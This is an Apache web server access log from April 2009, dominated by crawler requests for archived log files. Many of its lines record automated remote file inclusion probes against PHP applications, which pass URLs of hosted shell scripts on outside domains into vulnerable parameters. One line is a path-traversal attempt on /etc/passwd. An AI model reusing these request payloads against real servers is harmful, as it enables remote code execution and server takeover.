87.106.29.58 - - [09/Apr/2009:15:02:24 -0500] "GET /logs/index.php?configFile=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
87.106.29.58 - - [09/Apr/2009:15:03:35 -0500] "GET /index.php?configFile=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
87.106.29.58 - - [09/Apr/2009:15:03:36 -0500] "GET /logs/index.php?configFile=http://www.ohnnurychurch.org/bbs/skin/idi.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
62.112.155.145 - - [09/Apr/2009:15:04:28 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.69"
62.112.155.145 - - [09/Apr/2009:15:04:36 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
94.76.213.218 - - [09/Apr/2009:15:04:36 -0500] "GET /logs/access_log.1229472000 HTTP/1.1" 200 14129 "http://fortpit.pconline.com/logs/access_log.1229472000""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; iOpus-I-M; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322)"
62.112.155.145 - - [09/Apr/2009:15:04:46 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.69"
62.112.155.145 - - [09/Apr/2009:15:04:52 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
62.112.155.145 - - [09/Apr/2009:15:07:15 -0500] "GET /logs//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.69"
62.112.155.145 - - [09/Apr/2009:15:07:20 -0500] "GET //kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
62.112.155.145 - - [09/Apr/2009:15:08:27 -0500] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.69"
62.112.155.145 - - [09/Apr/2009:15:08:32 -0500] "GET //kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
174.129.90.71 - - [09/Apr/2009:15:14:47 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
174.129.90.71 - - [09/Apr/2009:15:14:47 -0500] "GET /logs/access_log.1213401600 HTTP/1.0" 200 284701 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
121.14.37.144 - - [09/Apr/2009:15:21:55 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.14.37.144 - - [09/Apr/2009:15:21:55 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.14.37.144 - - [09/Apr/2009:15:22:01 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.14.37.144 - - [09/Apr/2009:15:22:07 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.208.130 - - [09/Apr/2009:15:25:18 -0500] "GET /logs/access_log.1226880000 HTTP/1.1" 200 10971 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:25:47 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 200 6837 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:25:48 -0500] "GET /logs/access_log.1118275200 HTTP/1.1" 200 4611 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:25:49 -0500] "GET /logs/access_log.1133827200 HTTP/1.1" 200 2602 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:25:50 -0500] "GET /logs/access_log.1217462400 HTTP/1.1" 200 2403 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:25:52 -0500] "GET /logs/access_log.1184025600 HTTP/1.1" 200 1711 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:25:56 -0500] "GET /logs/access_log.1180828800 HTTP/1.1" 200 3428 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:25:58 -0500] "GET /logs/access_log.1116633600 HTTP/1.1" 200 334 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:26:00 -0500] "GET /logs/access_log.1134000000 HTTP/1.1" 200 669 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:15:26:01 -0500] "GET /logs/access_log.1138579200 HTTP/1.1" 200 334 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
222.236.44.38 - - [09/Apr/2009:15:29:29 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:29:29 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:29:29 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.112.155.145 - - [09/Apr/2009:15:29:29 -0500] "GET /logs//_test_holidays.php?APB_rp=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.69"
62.112.155.145 - - [09/Apr/2009:15:29:35 -0500] "GET //_test_holidays.php?APB_rp=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.69"
222.236.44.38 - - [09/Apr/2009:15:29:42 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:15:31:19 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:15:31:22 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:15:31:22 -0500] "GET /logs/access_log.1233014400//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
87.106.64.66 - - [09/Apr/2009:15:31:22 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:32:03 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:32:03 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:32:03 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:32:14 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.99.29.27 - - [09/Apr/2009:15:32:46 -0500] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=RNWE,RNWE:2004-29,RNWE:en&q=golf""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; FDM)"
95.168.170.105 - - [09/Apr/2009:15:34:40 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.savision.de/kreta/r57/test.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
95.168.170.105 - - [09/Apr/2009:15:34:41 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.savision.de/kreta/r57/test.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
85.237.201.58 - - [09/Apr/2009:15:35:37 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
85.237.201.58 - - [09/Apr/2009:15:35:37 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.237.201.58 - - [09/Apr/2009:15:35:44 -0500] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
85.237.201.58 - - [09/Apr/2009:15:35:44 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
217.29.159.130 - - [09/Apr/2009:15:36:28 -0500] "GET //bbs/include/print_category.php?setup[use_category]=1&dir=http://www.jense.biz/media/r57/test.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
222.236.44.38 - - [09/Apr/2009:15:37:46 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:37:46 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:37:46 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.44.38 - - [09/Apr/2009:15:37:55 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.tos-belarus.org/scan/copyright.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.208.140 - - [09/Apr/2009:15:42:43 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 200 15402 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
174.129.90.71 - - [09/Apr/2009:15:48:01 -0500] "GET /logs/access_log.1203465600 HTTP/1.0" 200 145796 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
125.244.77.2 - - [09/Apr/2009:15:49:34 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.817"
125.244.77.2 - - [09/Apr/2009:15:49:35 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.817"
174.129.90.71 - - [09/Apr/2009:15:50:55 -0500] "GET /logs/access_log.1192060800 HTTP/1.0" 200 206493 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
218.246.20.221 - - [09/Apr/2009:16:06:47 -0500] "GET /logs/access_log.1235952000/snippet.reflect.php?reflect_base=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.246.20.221 - - [09/Apr/2009:16:06:47 -0500] "GET /logs/snippet.reflect.php?reflect_base=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.246.20.221 - - [09/Apr/2009:16:06:48 -0500] "GET /snippet.reflect.php?reflect_base=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
8.20.84.15 - - [09/Apr/2009:16:07:32 -0500] "GET /logs/access_log.1232409600 HTTP/1.1" 200 200173 "-""Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.4) Gecko/2008112309 Iceweasel/3.0.4 (Debian-3.0.4-1)"
218.246.20.221 - - [09/Apr/2009:16:07:57 -0500] "GET /logs/access_log.1236211200/snippet.reflect.php?reflect_base=http://www.chodskypes.net/mambots/id.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
125.244.77.2 - - [09/Apr/2009:16:12:05 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.817"
125.244.77.2 - - [09/Apr/2009:16:12:05 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://pxmedia.pl/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.817"
81.91.84.17 - - [09/Apr/2009:16:14:09 -0500] "GET /logs/access_log.1228867200//include/admin.lib.inc.php?site_path=http://auto-mechanik.cz/language/FX29ID1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.91.84.17 - - [09/Apr/2009:16:14:09 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://auto-mechanik.cz/language/FX29ID1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.91.84.17 - - [09/Apr/2009:16:14:09 -0500] "GET //include/admin.lib.inc.php?site_path=http://auto-mechanik.cz/language/FX29ID1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
206.51.230.20 - - [09/Apr/2009:16:15:18 -0500] "GET /logs/access_log.1237248000 HTTP/1.1" 200 163840 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
174.129.90.71 - - [09/Apr/2009:16:16:33 -0500] "GET /logs/access_log.1205971200 HTTP/1.0" 200 150636 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
65.55.208.140 - - [09/Apr/2009:16:24:14 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.140 - - [09/Apr/2009:16:24:14 -0500] "GET /logs/access_log.1194825600 HTTP/1.1" 200 15402 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:26:40 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:26:41 -0500] "GET /logs/access_log.1138579200 HTTP/1.1" 200 334 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:26:41 -0500] "GET /logs/access_log.1116633600 HTTP/1.1" 200 334 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:26:41 -0500] "GET /logs/access_log.1134000000 HTTP/1.1" 200 669 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:30:17 -0500] "GET /logs/access_log.1118275200 HTTP/1.1" 200 4611 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:30:18 -0500] "GET /logs/access_log.1184025600 HTTP/1.1" 200 1711 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:30:18 -0500] "GET /logs/access_log.1217116800 HTTP/1.1" 200 6837 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.17.10.239 - - [09/Apr/2009:16:30:25 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.17.10.239 - - [09/Apr/2009:16:30:25 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
85.17.10.239 - - [09/Apr/2009:16:30:27 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.17.10.239 - - [09/Apr/2009:16:30:27 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.wizard.com.br/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
72.55.164.230 - - [09/Apr/2009:16:30:40 -0500] "GET /logs/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://64.13.230.27/logs/tst.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.820"
72.55.164.230 - - [09/Apr/2009:16:30:40 -0500] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://64.13.230.27/logs/tst.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.820"
72.55.164.230 - - [09/Apr/2009:16:30:44 -0500] "GET /logs/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://64.13.230.27/logs/tst.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.820"
72.55.164.230 - - [09/Apr/2009:16:30:44 -0500] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://64.13.230.27/logs/tst.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.820"
66.40.38.170 - - [09/Apr/2009:16:40:47 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 312 "-""Mozilla/5.0"
66.40.38.170 - - [09/Apr/2009:16:40:47 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.40.38.170 - - [09/Apr/2009:16:40:48 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 307 "-""Mozilla/5.0"
66.40.38.170 - - [09/Apr/2009:16:40:48 -0500] "GET /logs/access_log.1235088000//include/bbs.lib.inc.php?site_path=http://www.northshoredojo.net/img/id.txt?%20? HTTP/1.1" 404 334 "-""Mozilla/5.0"
66.90.118.42 - - [09/Apr/2009:16:45:40 -0500] "GET /logs/main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.810"
66.90.118.42 - - [09/Apr/2009:16:45:40 -0500] "GET /main.php?x=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.810"
65.55.208.141 - - [09/Apr/2009:16:46:54 -0500] "GET /logs/access_log.1180828800 HTTP/1.1" 200 3428 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:46:54 -0500] "GET /logs/access_log.1156982400 HTTP/1.1" 200 270 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:46:54 -0500] "GET /logs/access_log.1217462400 HTTP/1.1" 200 2403 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:46:54 -0500] "GET /logs/access_log.1149811200 HTTP/1.1" 200 655 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:47:09 -0500] "GET /logs/access_log.1133827200 HTTP/1.1" 200 2602 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.141 - - [09/Apr/2009:16:47:22 -0500] "GET /logs/access_log.1158537600 HTTP/1.1" 200 658 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
95.168.170.105 - - [09/Apr/2009:16:52:53 -0500] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://www.savision.de/kreta/r57/test.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
95.168.170.105 - - [09/Apr/2009:16:52:53 -0500] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.savision.de/kreta/r57/test.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
85.237.201.58 - - [09/Apr/2009:16:52:56 -0500] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
85.237.201.58 - - [09/Apr/2009:16:52:56 -0500] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
217.29.159.130 - - [09/Apr/2009:16:53:49 -0500] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://www.jense.biz/media/r57/test.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
209.90.77.43 - - [09/Apr/2009:17:01:10 -0500] "GET /logs/access_log.1237852800//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:01:10 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:01:10 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
85.237.201.58 - - [09/Apr/2009:17:02:46 -0500] "GET /logs//content/multithumb/multithumb?mosConfig_absolute_path=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
85.237.201.58 - - [09/Apr/2009:17:02:47 -0500] "GET //content/multithumb/multithumb?mosConfig_absolute_path=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
209.90.77.43 - - [09/Apr/2009:17:04:40 -0500] "GET /logs/access_log.1233705600//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:04:40 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:04:41 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:05:50 -0500] "GET /logs/access_log.1234224000//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.64.34.249 - - [09/Apr/2009:17:07:06 -0500] "GET /logs//contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
69.64.34.249 - - [09/Apr/2009:17:07:06 -0500] "GET //contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.55.208.142 - - [09/Apr/2009:17:07:42 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [09/Apr/2009:17:07:42 -0500] "GET /logs/access_log.1154736000 HTTP/1.1" 200 321 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [09/Apr/2009:17:07:42 -0500] "GET /logs/access_log.1184371200 HTTP/1.1" 200 1640 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [09/Apr/2009:17:07:43 -0500] "GET /logs/access_log.1200614400 HTTP/1.1" 200 1630 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [09/Apr/2009:17:07:43 -0500] "GET /logs/access_log.1212969600 HTTP/1.1" 200 325 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
209.90.77.43 - - [09/Apr/2009:17:10:05 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:10:05 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:10:05 -0500] "GET /logs/access_log.1237248000//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:18:17 -0500] "GET /logs/access_log.1233705600//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:18:17 -0500] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 316 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:18:17 -0500] "GET //includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
209.90.77.43 - - [09/Apr/2009:17:18:17 -0500] "GET /logs/access_log.1234483200//includes/ktedit/toolbar.php?dirDepth=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
82.146.52.196 - - [09/Apr/2009:17:30:10 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://pastebin.com/f448457c2???? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
82.146.52.196 - - [09/Apr/2009:17:30:10 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://pastebin.com/f448457c2???? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
208.111.154.29 - - [09/Apr/2009:17:40:57 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.29 - - [09/Apr/2009:17:40:57 -0500] "GET /_vti_cnf?N=D HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
208.111.154.29 - - [09/Apr/2009:17:40:58 -0500] "GET /_vti_cnf/?N=D HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
65.55.208.130 - - [09/Apr/2009:17:41:38 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
